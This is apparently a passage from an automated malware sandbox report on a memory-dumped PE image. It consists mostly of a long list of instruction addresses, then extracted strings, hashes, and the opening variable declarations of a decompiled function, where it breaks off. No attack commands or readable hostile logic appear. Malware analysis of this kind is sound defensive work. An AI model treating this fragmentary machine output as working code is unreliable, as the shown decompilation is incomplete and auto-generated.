                                                                                                                                                                                                                    0x00a7fc08
                                                                                                                                                                                                                    0x00a7fc13
                                                                                                                                                                                                                    0x00a7fc1e
                                                                                                                                                                                                                    0x00a7fc26
                                                                                                                                                                                                                    0x00a7fc31
                                                                                                                                                                                                                    0x00a7fc3c
                                                                                                                                                                                                                    0x00a7fc47
                                                                                                                                                                                                                    0x00a7fc4f
                                                                                                                                                                                                                    0x00a7fc5a
                                                                                                                                                                                                                    0x00a7fc65
                                                                                                                                                                                                                    0x00a7fc6d
                                                                                                                                                                                                                    0x00a7fc78
                                                                                                                                                                                                                    0x00a7fc8b
                                                                                                                                                                                                                    0x00a7fc92
                                                                                                                                                                                                                    0x00a7fc9a
                                                                                                                                                                                                                    0x00a7fca2
                                                                                                                                                                                                                    0x00a7fcad
                                                                                                                                                                                                                    0x00a7fcb8
                                                                                                                                                                                                                    0x00a7fcc0
                                                                                                                                                                                                                    0x00a7fccb
                                                                                                                                                                                                                    0x00a7fcd6
                                                                                                                                                                                                                    0x00a7fcde
                                                                                                                                                                                                                    0x00a7fce9
                                                                                                                                                                                                                    0x00a7fcf1
                                                                                                                                                                                                                    0x00a7fcf9
                                                                                                                                                                                                                    0x00a7fd01
                                                                                                                                                                                                                    0x00a7fd09
                                                                                                                                                                                                                    0x00a7fd11
                                                                                                                                                                                                                    0x00a7fd19
                                                                                                                                                                                                                    0x00a7fd21
                                                                                                                                                                                                                    0x00a7fd25
                                                                                                                                                                                                                    0x00a7fd2d
                                                                                                                                                                                                                    0x00a7fd35
                                                                                                                                                                                                                    0x00a7fd48
                                                                                                                                                                                                                    0x00a7fd4f
                                                                                                                                                                                                                    0x00a7fd57
                                                                                                                                                                                                                    0x00a7fd62
                                                                                                                                                                                                                    0x00a7fd6a
                                                                                                                                                                                                                    0x00a7fd6f
                                                                                                                                                                                                                    0x00a7fd79
                                                                                                                                                                                                                    0x00a7fd7e
                                                                                                                                                                                                                    0x00a7fd86
                                                                                                                                                                                                                    0x00a7fd9c
                                                                                                                                                                                                                    0x00a7fda5
                                                                                                                                                                                                                    0x00a7fdb0
                                                                                                                                                                                                                    0x00a7fdb8
                                                                                                                                                                                                                    0x00a7fdbd
                                                                                                                                                                                                                    0x00a7fdc5
                                                                                                                                                                                                                    0x00a7fdca
                                                                                                                                                                                                                    0x00a7fdd2
                                                                                                                                                                                                                    0x00a7fddd
                                                                                                                                                                                                                    0x00a7fde8
                                                                                                                                                                                                                    0x00a7fdf3
                                                                                                                                                                                                                    0x00a7fdfe
                                                                                                                                                                                                                    0x00a7fe09
                                                                                                                                                                                                                    0x00a7fe14
                                                                                                                                                                                                                    0x00a7fe1f
                                                                                                                                                                                                                    0x00a7fe2a
                                                                                                                                                                                                                    0x00a7fe35
                                                                                                                                                                                                                    0x00a7fe3d
                                                                                                                                                                                                                    0x00a7fe45
                                                                                                                                                                                                                    0x00a7fe52
                                                                                                                                                                                                                    0x00a7fe53
                                                                                                                                                                                                                    0x00a7fe57
                                                                                                                                                                                                                    0x00a7fe5f
                                                                                                                                                                                                                    0x00a7fe73
                                                                                                                                                                                                                    0x00a7fe7a
                                                                                                                                                                                                                    0x00a7fe85
                                                                                                                                                                                                                    0x00a7fe90
                                                                                                                                                                                                                    0x00a7fe9b
                                                                                                                                                                                                                    0x00a7fea6
                                                                                                                                                                                                                    0x00a7feb1
                                                                                                                                                                                                                    0x00a7febc
                                                                                                                                                                                                                    0x00a7fec9
                                                                                                                                                                                                                    0x00a7fecd
                                                                                                                                                                                                                    0x00a7fed5
                                                                                                                                                                                                                    0x00a7fedd
                                                                                                                                                                                                                    0x00a7fee5
                                                                                                                                                                                                                    0x00a7fef0
                                                                                                                                                                                                                    0x00a7fefb
                                                                                                                                                                                                                    0x00a7ff06
                                                                                                                                                                                                                    0x00a7ff11
                                                                                                                                                                                                                    0x00a7ff1c
                                                                                                                                                                                                                    0x00a7ff24
                                                                                                                                                                                                                    0x00a7ff2f
                                                                                                                                                                                                                    0x00a7ff42
                                                                                                                                                                                                                    0x00a7ff49
                                                                                                                                                                                                                    0x00a7ff54
                                                                                                                                                                                                                    0x00a7ff5f
                                                                                                                                                                                                                    0x00a7ff6a
                                                                                                                                                                                                                    0x00a7ff75
                                                                                                                                                                                                                    0x00a7ff80
                                                                                                                                                                                                                    0x00a7ff8b
                                                                                                                                                                                                                    0x00a7ff93
                                                                                                                                                                                                                    0x00a7ff9e
                                                                                                                                                                                                                    0x00a7ffa9
                                                                                                                                                                                                                    0x00a7ffb4
                                                                                                                                                                                                                    0x00a7ffbf
                                                                                                                                                                                                                    0x00a7ffca
                                                                                                                                                                                                                    0x00a7ffd5
                                                                                                                                                                                                                    0x00a7ffe0
                                                                                                                                                                                                                    0x00a7ffeb
                                                                                                                                                                                                                    0x00a7fff6
                                                                                                                                                                                                                    0x00a80001
                                                                                                                                                                                                                    0x00a8000c
                                                                                                                                                                                                                    0x00a80014
                                                                                                                                                                                                                    0x00a80021
                                                                                                                                                                                                                    0x00a80035
                                                                                                                                                                                                                    0x00a8003a
                                                                                                                                                                                                                    0x00a80041
                                                                                                                                                                                                                    0x00a8004c
                                                                                                                                                                                                                    0x00a8005a
                                                                                                                                                                                                                    0x00a8005f
                                                                                                                                                                                                                    0x00a80063
                                                                                                                                                                                                                    0x00a80068
                                                                                                                                                                                                                    0x00a80070
                                                                                                                                                                                                                    0x00a80078
                                                                                                                                                                                                                    0x00a8008e
                                                                                                                                                                                                                    0x00a80097
                                                                                                                                                                                                                    0x00a800a2
                                                                                                                                                                                                                    0x00a800b4
                                                                                                                                                                                                                    0x00a800b9
                                                                                                                                                                                                                    0x00a800c0
                                                                                                                                                                                                                    0x00a800cb
                                                                                                                                                                                                                    0x00a800d6
                                                                                                                                                                                                                    0x00a800e1
                                                                                                                                                                                                                    0x00a800f1
                                                                                                                                                                                                                    0x00a800f7
                                                                                                                                                                                                                    0x00a800fc
                                                                                                                                                                                                                    0x00a80104
                                                                                                                                                                                                                    0x00a8010c
                                                                                                                                                                                                                    0x00a80114
                                                                                                                                                                                                                    0x00a8011c
                                                                                                                                                                                                                    0x00a80121
                                                                                                                                                                                                                    0x00a80129
                                                                                                                                                                                                                    0x00a80131
                                                                                                                                                                                                                    0x00a8013c
                                                                                                                                                                                                                    0x00a80147
                                                                                                                                                                                                                    0x00a80152
                                                                                                                                                                                                                    0x00a8015d
                                                                                                                                                                                                                    0x00a80165
                                                                                                                                                                                                                    0x00a8016a
                                                                                                                                                                                                                    0x00a80172
                                                                                                                                                                                                                    0x00a8017a
                                                                                                                                                                                                                    0x00a80182
                                                                                                                                                                                                                    0x00a8018a
                                                                                                                                                                                                                    0x00a80192
                                                                                                                                                                                                                    0x00a8019b
                                                                                                                                                                                                                    0x00a801a0
                                                                                                                                                                                                                    0x00a801a6
                                                                                                                                                                                                                    0x00a801ae
                                                                                                                                                                                                                    0x00a801b9
                                                                                                                                                                                                                    0x00a801c4
                                                                                                                                                                                                                    0x00a801cf
                                                                                                                                                                                                                    0x00a801db
                                                                                                                                                                                                                    0x00a801e0
                                                                                                                                                                                                                    0x00a801e4
                                                                                                                                                                                                                    0x00a801e9
                                                                                                                                                                                                                    0x00a801f1
                                                                                                                                                                                                                    0x00a801fb
                                                                                                                                                                                                                    0x00a8020d
                                                                                                                                                                                                                    0x00a80219
                                                                                                                                                                                                                    0x00a80225
                                                                                                                                                                                                                    0x00a80230
                                                                                                                                                                                                                    0x00a8023b
                                                                                                                                                                                                                    0x00a80246
                                                                                                                                                                                                                    0x00a80251
                                                                                                                                                                                                                    0x00a8025c
                                                                                                                                                                                                                    0x00a80267
                                                                                                                                                                                                                    0x00a80272
                                                                                                                                                                                                                    0x00a8027d
                                                                                                                                                                                                                    0x00a80288
                                                                                                                                                                                                                    0x00a80293
                                                                                                                                                                                                                    0x00a8029e
                                                                                                                                                                                                                    0x00a802a9
                                                                                                                                                                                                                    0x00a802bd
                                                                                                                                                                                                                    0x00a802c2
                                                                                                                                                                                                                    0x00a802c9
                                                                                                                                                                                                                    0x00a802d4
                                                                                                                                                                                                                    0x00a802ea
                                                                                                                                                                                                                    0x00a802f3
                                                                                                                                                                                                                    0x00a802fb
                                                                                                                                                                                                                    0x00a80306
                                                                                                                                                                                                                    0x00a80311
                                                                                                                                                                                                                    0x00a80318
                                                                                                                                                                                                                    0x00a80323
                                                                                                                                                                                                                    0x00a8032b
                                                                                                                                                                                                                    0x00a80333
                                                                                                                                                                                                                    0x00a8033f
                                                                                                                                                                                                                    0x00a80344
                                                                                                                                                                                                                    0x00a8034a
                                                                                                                                                                                                                    0x00a80352
                                                                                                                                                                                                                    0x00a8035a
                                                                                                                                                                                                                    0x00a80362
                                                                                                                                                                                                                    0x00a80367
                                                                                                                                                                                                                    0x00a8036c
                                                                                                                                                                                                                    0x00a80374
                                                                                                                                                                                                                    0x00a8037f
                                                                                                                                                                                                                    0x00a80391
                                                                                                                                                                                                                    0x00a8039b
                                                                                                                                                                                                                    0x00a803a2
                                                                                                                                                                                                                    0x00a803ad
                                                                                                                                                                                                                    0x00a803c0
                                                                                                                                                                                                                    0x00a803c7
                                                                                                                                                                                                                    0x00a803d2
                                                                                                                                                                                                                    0x00a803dd
                                                                                                                                                                                                                    0x00a803e5
                                                                                                                                                                                                                    0x00a803ed
                                                                                                                                                                                                                    0x00a803f5
                                                                                                                                                                                                                    0x00a80400
                                                                                                                                                                                                                    0x00a80413
                                                                                                                                                                                                                    0x00a8041a
                                                                                                                                                                                                                    0x00a80425
                                                                                                                                                                                                                    0x00a80430
                                                                                                                                                                                                                    0x00a80438
                                                                                                                                                                                                                    0x00a80443
                                                                                                                                                                                                                    0x00a8044e
                                                                                                                                                                                                                    0x00a80459
                                                                                                                                                                                                                    0x00a80459
                                                                                                                                                                                                                    0x00a80464
                                                                                                                                                                                                                    0x00a80464
                                                                                                                                                                                                                    0x00a80464
                                                                                                                                                                                                                    0x00a80464
                                                                                                                                                                                                                    0x00a8046a
                                                                                                                                                                                                                    0x00a8046a
                                                                                                                                                                                                                    0x00a80470
                                                                                                                                                                                                                    0x00a80470
                                                                                                                                                                                                                    0x00a808a3
                                                                                                                                                                                                                    0x00a808a8
                                                                                                                                                                                                                    0x00a80464
                                                                                                                                                                                                                    0x00a80464
                                                                                                                                                                                                                    0x00a80464
                                                                                                                                                                                                                    0x00a8046a
                                                                                                                                                                                                                    0x00a8046a
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a8046a
                                                                                                                                                                                                                    0x00a80464
                                                                                                                                                                                                                    0x00a80476
                                                                                                                                                                                                                    0x00a8047c
                                                                                                                                                                                                                    0x00a8067a
                                                                                                                                                                                                                    0x00a8067c
                                                                                                                                                                                                                    0x00a8075c
                                                                                                                                                                                                                    0x00a80762
                                                                                                                                                                                                                    0x00a80895
                                                                                                                                                                                                                    0x00a80464
                                                                                                                                                                                                                    0x00a80464
                                                                                                                                                                                                                    0x00a80464
                                                                                                                                                                                                                    0x00a8046a
                                                                                                                                                                                                                    0x00a8046a
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a8046a
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a80464
                                                                                                                                                                                                                    0x00a80768
                                                                                                                                                                                                                    0x00a8076e
                                                                                                                                                                                                                    0x00a80886
                                                                                                                                                                                                                    0x00a8088b
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a8088b
                                                                                                                                                                                                                    0x00a80774
                                                                                                                                                                                                                    0x00a8077a
                                                                                                                                                                                                                    0x00a807c9
                                                                                                                                                                                                                    0x00a807f6
                                                                                                                                                                                                                    0x00a8081a
                                                                                                                                                                                                                    0x00a8083f
                                                                                                                                                                                                                    0x00a80847
                                                                                                                                                                                                                    0x00a8084d
                                                                                                                                                                                                                    0x00a80867
                                                                                                                                                                                                                    0x00a8086e
                                                                                                                                                                                                                    0x00a80873
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a80873
                                                                                                                                                                                                                    0x00a8077c
                                                                                                                                                                                                                    0x00a80782
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a8078c
                                                                                                                                                                                                                    0x00a80791
                                                                                                                                                                                                                    0x00a80793
                                                                                                                                                                                                                    0x00a80d30
                                                                                                                                                                                                                    0x00a80d37
                                                                                                                                                                                                                    0x00a80d37
                                                                                                                                                                                                                    0x00a80799
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a80799
                                                                                                                                                                                                                    0x00a80682
                                                                                                                                                                                                                    0x00a8074c
                                                                                                                                                                                                                    0x00a80751
                                                                                                                                                                                                                    0x00a80752
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a80752
                                                                                                                                                                                                                    0x00a80688
                                                                                                                                                                                                                    0x00a8068e
                                                                                                                                                                                                                    0x00a80d2b
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a80d2b
                                                                                                                                                                                                                    0x00a80694
                                                                                                                                                                                                                    0x00a8069a
                                                                                                                                                                                                                    0x00a80728
                                                                                                                                                                                                                    0x00a8072d
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a8072d
                                                                                                                                                                                                                    0x00a8069c
                                                                                                                                                                                                                    0x00a806a2
                                                                                                                                                                                                                    0x00a806fc
                                                                                                                                                                                                                    0x00a80706
                                                                                                                                                                                                                    0x00a8070e
                                                                                                                                                                                                                    0x00a8070f
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a8070f
                                                                                                                                                                                                                    0x00a806a4
                                                                                                                                                                                                                    0x00a806aa
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a806c6
                                                                                                                                                                                                                    0x00a806cd
                                                                                                                                                                                                                    0x00a806d2
                                                                                                                                                                                                                    0x00a806d2
                                                                                                                                                                                                                    0x00a806d5
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a806d5
                                                                                                                                                                                                                    0x00a80482
                                                                                                                                                                                                                    0x00a80d1c
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a80d21
                                                                                                                                                                                                                    0x00a80488
                                                                                                                                                                                                                    0x00a8048e
                                                                                                                                                                                                                    0x00a80566
                                                                                                                                                                                                                    0x00a8056c
                                                                                                                                                                                                                    0x00a80663
                                                                                                                                                                                                                    0x00a80668
                                                                                                                                                                                                                    0x00a8066a
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a80670
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a80670
                                                                                                                                                                                                                    0x00a80572
                                                                                                                                                                                                                    0x00a80578
                                                                                                                                                                                                                    0x00a805e7
                                                                                                                                                                                                                    0x00a805ef
                                                                                                                                                                                                                    0x00a805f4
                                                                                                                                                                                                                    0x00a805f7
                                                                                                                                                                                                                    0x00a805f9
                                                                                                                                                                                                                    0x00a80636
                                                                                                                                                                                                                    0x00a8063d
                                                                                                                                                                                                                    0x00a80640
                                                                                                                                                                                                                    0x00a8064c
                                                                                                                                                                                                                    0x00a8064e
                                                                                                                                                                                                                    0x00a80655
                                                                                                                                                                                                                    0x00a80655
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a80655
                                                                                                                                                                                                                    0x00a80650
                                                                                                                                                                                                                    0x00a80653
                                                                                                                                                                                                                    0x00a8062c
                                                                                                                                                                                                                    0x00a8062c
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a8062c
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a80653
                                                                                                                                                                                                                    0x00a80642
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a80642
                                                                                                                                                                                                                    0x00a80610
                                                                                                                                                                                                                    0x00a80611
                                                                                                                                                                                                                    0x00a80619
                                                                                                                                                                                                                    0x00a80620
                                                                                                                                                                                                                    0x00a80625
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a8062a
                                                                                                                                                                                                                    0x00a8057a
                                                                                                                                                                                                                    0x00a80580
                                                                                                                                                                                                                    0x00a805b3
                                                                                                                                                                                                                    0x00a805b8
                                                                                                                                                                                                                    0x00a805bf
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a805bf
                                                                                                                                                                                                                    0x00a80582
                                                                                                                                                                                                                    0x00a80588
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a80599
                                                                                                                                                                                                                    0x00a8059e
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a8059e
                                                                                                                                                                                                                    0x00a80494
                                                                                                                                                                                                                    0x00a80547
                                                                                                                                                                                                                    0x00a8054c
                                                                                                                                                                                                                    0x00a80553
                                                                                                                                                                                                                    0x00a8055b
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a8055b
                                                                                                                                                                                                                    0x00a8049c
                                                                                                                                                                                                                    0x00a804f7
                                                                                                                                                                                                                    0x00a804fc
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a804fc
                                                                                                                                                                                                                    0x00a804a4
                                                                                                                                                                                                                    0x00a804da
                                                                                                                                                                                                                    0x00a804df
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a804df
                                                                                                                                                                                                                    0x00a804ac
                                                                                                                                                                                                                    0x00a80d07
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a80d07
                                                                                                                                                                                                                    0x00a804b8
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a804be
                                                                                                                                                                                                                    0x00a804be
                                                                                                                                                                                                                    0x00a804c5
                                                                                                                                                                                                                    0x00a804ca
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a804ca
                                                                                                                                                                                                                    0x00a808b2
                                                                                                                                                                                                                    0x00a808b2
                                                                                                                                                                                                                    0x00a808b8
                                                                                                                                                                                                                    0x00a80aca
                                                                                                                                                                                                                    0x00a80ad0
                                                                                                                                                                                                                    0x00a80bbc
                                                                                                                                                                                                                    0x00a80bc2
                                                                                                                                                                                                                    0x00a80cad
                                                                                                                                                                                                                    0x00a80cb2
                                                                                                                                                                                                                    0x00a80cb4
                                                                                                                                                                                                                    0x00a80cda
                                                                                                                                                                                                                    0x00a80cdf
                                                                                                                                                                                                                    0x00a80ce1
                                                                                                                                                                                                                    0x00a80ced
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a80ced
                                                                                                                                                                                                                    0x00a80ce3
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a80ce3
                                                                                                                                                                                                                    0x00a80cbd
                                                                                                                                                                                                                    0x00a80cc6
                                                                                                                                                                                                                    0x00a80cc8
                                                                                                                                                                                                                    0x00a80a1c
                                                                                                                                                                                                                    0x00a80a1c
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a80a1c
                                                                                                                                                                                                                    0x00a80bc8
                                                                                                                                                                                                                    0x00a80bce
                                                                                                                                                                                                                    0x00a80c8f
                                                                                                                                                                                                                    0x00a80c94
                                                                                                                                                                                                                    0x00a80c96
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a80c9c
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a80c9c
                                                                                                                                                                                                                    0x00a80bd4
                                                                                                                                                                                                                    0x00a80bda
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a80bf9
                                                                                                                                                                                                                    0x00a80bff
                                                                                                                                                                                                                    0x00a80c00
                                                                                                                                                                                                                    0x00a80c02
                                                                                                                                                                                                                    0x00a80c0a
                                                                                                                                                                                                                    0x00a80c11
                                                                                                                                                                                                                    0x00a80c13
                                                                                                                                                                                                                    0x00a80c27
                                                                                                                                                                                                                    0x00a80c28
                                                                                                                                                                                                                    0x00a80c30
                                                                                                                                                                                                                    0x00a80c37
                                                                                                                                                                                                                    0x00a80c3e
                                                                                                                                                                                                                    0x00a80c41
                                                                                                                                                                                                                    0x00a80c41
                                                                                                                                                                                                                    0x00a80c48
                                                                                                                                                                                                                    0x00a80c4b
                                                                                                                                                                                                                    0x00a80c62
                                                                                                                                                                                                                    0x00a80c63
                                                                                                                                                                                                                    0x00a80c6b
                                                                                                                                                                                                                    0x00a80c72
                                                                                                                                                                                                                    0x00a80c77
                                                                                                                                                                                                                    0x00a80c7a
                                                                                                                                                                                                                    0x00a80c04
                                                                                                                                                                                                                    0x00a80c04
                                                                                                                                                                                                                    0x00a80c04
                                                                                                                                                                                                                    0x00a80c7c
                                                                                                                                                                                                                    0x00a80c7e
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a80c7e
                                                                                                                                                                                                                    0x00a80ad6
                                                                                                                                                                                                                    0x00a80ba0
                                                                                                                                                                                                                    0x00a80ba9
                                                                                                                                                                                                                    0x00a80bb1
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a80bb1
                                                                                                                                                                                                                    0x00a80adc
                                                                                                                                                                                                                    0x00a80ae2
                                                                                                                                                                                                                    0x00a80b6a
                                                                                                                                                                                                                    0x00a80b73
                                                                                                                                                                                                                    0x00a80b86
                                                                                                                                                                                                                    0x00a80b87
                                                                                                                                                                                                                    0x00a80b8c
                                                                                                                                                                                                                    0x00a80b90
                                                                                                                                                                                                                    0x00a80b95
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a80b95
                                                                                                                                                                                                                    0x00a80ae4
                                                                                                                                                                                                                    0x00a80aea
                                                                                                                                                                                                                    0x00a80b4d
                                                                                                                                                                                                                    0x00a80b52
                                                                                                                                                                                                                    0x00a80b59
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a80b59
                                                                                                                                                                                                                    0x00a80aec
                                                                                                                                                                                                                    0x00a80af2
                                                                                                                                                                                                                    0x00a80b2b
                                                                                                                                                                                                                    0x00a80b30
                                                                                                                                                                                                                    0x00a80b32
                                                                                                                                                                                                                    0x00a80b3f
                                                                                                                                                                                                                    0x00a80b3f
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a80b32
                                                                                                                                                                                                                    0x00a80af4
                                                                                                                                                                                                                    0x00a80afa
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a80b0e
                                                                                                                                                                                                                    0x00a80b13
                                                                                                                                                                                                                    0x00a80b1a
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a80b1a
                                                                                                                                                                                                                    0x00a808be
                                                                                                                                                                                                                    0x00a80a9d
                                                                                                                                                                                                                    0x00a80ab2
                                                                                                                                                                                                                    0x00a80ab8
                                                                                                                                                                                                                    0x00a80ab9
                                                                                                                                                                                                                    0x00a80ac0
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a80ac0
                                                                                                                                                                                                                    0x00a808c4
                                                                                                                                                                                                                    0x00a808ca
                                                                                                                                                                                                                    0x00a809ba
                                                                                                                                                                                                                    0x00a809c0
                                                                                                                                                                                                                    0x00a80a6f
                                                                                                                                                                                                                    0x00a80a76
                                                                                                                                                                                                                    0x00a80a7b
                                                                                                                                                                                                                    0x00a80a7e
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a80a7e
                                                                                                                                                                                                                    0x00a809c6
                                                                                                                                                                                                                    0x00a809cc
                                                                                                                                                                                                                    0x00a80a2e
                                                                                                                                                                                                                    0x00a80a3a
                                                                                                                                                                                                                    0x00a80a43
                                                                                                                                                                                                                    0x00a80a4b
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a80a4b
                                                                                                                                                                                                                    0x00a809ce
                                                                                                                                                                                                                    0x00a809d4
                                                                                                                                                                                                                    0x00a80a0b
                                                                                                                                                                                                                    0x00a80a14
                                                                                                                                                                                                                    0x00a80a16
                                                                                                                                                                                                                    0x00a80a16
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a80a16
                                                                                                                                                                                                                    0x00a809d6
                                                                                                                                                                                                                    0x00a809dc
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a809e6
                                                                                                                                                                                                                    0x00a809eb
                                                                                                                                                                                                                    0x00a809ed
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a809f3
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a809f3
                                                                                                                                                                                                                    0x00a808d0
                                                                                                                                                                                                                    0x00a809ab
                                                                                                                                                                                                                    0x00a809b0
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a809b0
                                                                                                                                                                                                                    0x00a808d6
                                                                                                                                                                                                                    0x00a808dc
                                                                                                                                                                                                                    0x00a80988
                                                                                                                                                                                                                    0x00a8098f
                                                                                                                                                                                                                    0x00a80991
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a80991
                                                                                                                                                                                                                    0x00a808e2
                                                                                                                                                                                                                    0x00a808e8
                                                                                                                                                                                                                    0x00a80939
                                                                                                                                                                                                                    0x00a80940
                                                                                                                                                                                                                    0x00a80981
                                                                                                                                                                                                                    0x00a80981
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a80981
                                                                                                                                                                                                                    0x00a8095e
                                                                                                                                                                                                                    0x00a80964
                                                                                                                                                                                                                    0x00a80965
                                                                                                                                                                                                                    0x00a80969
                                                                                                                                                                                                                    0x00a8097c
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a8097c
                                                                                                                                                                                                                    0x00a8096b
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a8096b
                                                                                                                                                                                                                    0x00a808ea
                                                                                                                                                                                                                    0x00a808f0
                                                                                                                                                                                                                    0x00a8092a
                                                                                                                                                                                                                    0x00a8092f
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a8092f
                                                                                                                                                                                                                    0x00a808f2
                                                                                                                                                                                                                    0x00a808f8
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a8090c
                                                                                                                                                                                                                    0x00a80911
                                                                                                                                                                                                                    0x00a80913
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a80919
                                                                                                                                                                                                                    0x00a80919
                                                                                                                                                                                                                    0x00a80cf2
                                                                                                                                                                                                                    0x00a80cf2
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: 7$,e$/d$5xV$<r$Bn$C1-$E2$Jh-$V&S$Z!a$a$gNC$hs$kFf$yr:$y@ $|$@%$z0$2
                                                                                                                                                                                                                    • API String ID: 0-3541729955
                                                                                                                                                                                                                    • Opcode ID: 8a25311943d31774afb19ad15c478b3b875467b2fe268badee4f93d9871c58b2
                                                                                                                                                                                                                    • Instruction ID: 39b301f1e40e5910076e3da8e532fb525212aeff41e7aec19ba19ad3e2130a55
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a25311943d31774afb19ad15c478b3b875467b2fe268badee4f93d9871c58b2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8D211729093818BD3B8DF25C54ABDBBBE1BBD4304F10892DE5D99A261D7B09948CF43
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                                                                                    			E00A6C227(signed int __ecx) {
                                                                                                                                                                                                                    				char _v524;
                                                                                                                                                                                                                    				char _v1044;
                                                                                                                                                                                                                    				char _v1564;
                                                                                                                                                                                                                    				char _v2084;
                                                                                                                                                                                                                    				char _v2604;
                                                                                                                                                                                                                    				signed int _v2608;
                                                                                                                                                                                                                    				intOrPtr _v2612;
                                                                                                                                                                                                                    				intOrPtr _v2616;
                                                                                                                                                                                                                    				intOrPtr _v2620;
                                                                                                                                                                                                                    				char _v2624;
                                                                                                                                                                                                                    				signed int _v2628;
                                                                                                                                                                                                                    				signed int _v2632;
                                                                                                                                                                                                                    				signed int _v2636;
                                                                                                                                                                                                                    				signed int _v2640;
                                                                                                                                                                                                                    				signed int _v2644;
                                                                                                                                                                                                                    				signed int _v2648;
                                                                                                                                                                                                                    				signed int _v2652;
                                                                                                                                                                                                                    				signed int _v2656;
                                                                                                                                                                                                                    				signed int _v2660;
                                                                                                                                                                                                                    				signed int _v2664;
                                                                                                                                                                                                                    				signed int _v2668;
                                                                                                                                                                                                                    				signed int _v2672;
                                                                                                                                                                                                                    				signed int _v2676;
                                                                                                                                                                                                                    				signed int _v2680;
                                                                                                                                                                                                                    				unsigned int _v2684;
                                                                                                                                                                                                                    				signed int _v2688;
                                                                                                                                                                                                                    				signed int _v2692;
                                                                                                                                                                                                                    				signed int _v2696;
                                                                                                                                                                                                                    				signed int _v2700;
                                                                                                                                                                                                                    				signed int _v2704;
